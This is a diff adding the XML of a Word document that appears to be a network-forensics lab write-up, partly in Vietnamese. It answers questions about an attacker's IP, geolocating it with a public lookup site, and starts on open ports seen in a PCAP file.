+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>initiating</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>these</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>requests</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>on</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>our</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>server</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FA99531" wp14:editId="4D890CCA">
+            <wp:extent cx="5943600" cy="3965575"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="984042181" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="984042181" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId5"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="3965575"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Top of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Bottom of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Q2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Based</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>on</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>identified</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> IP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>address</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>associated</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>with</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>attacker</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, can </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>you</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>identify</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>country</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>from</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>which</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>attacker's</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>activities</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>originated</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="9"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Từ </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Ip</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> của kẻ tấn công ta có thể dùng trang </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>web</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId6" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t>https://en.ipshu.com/ipv4/</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t>&lt;IP</w:t>
+        </w:r>
+      </w:hyperlink>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> kẻ tấn công&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4054493B" wp14:editId="117C69D5">
+            <wp:extent cx="5943600" cy="2985770"/>
+            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
+            <wp:docPr id="1448740825" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1448740825" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5943600" cy="2985770"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Top of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:vanish/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Bottom of Form</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Q3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>From</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the PCAP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>file</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>multiple</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>open</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ports</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>were</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>detected</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
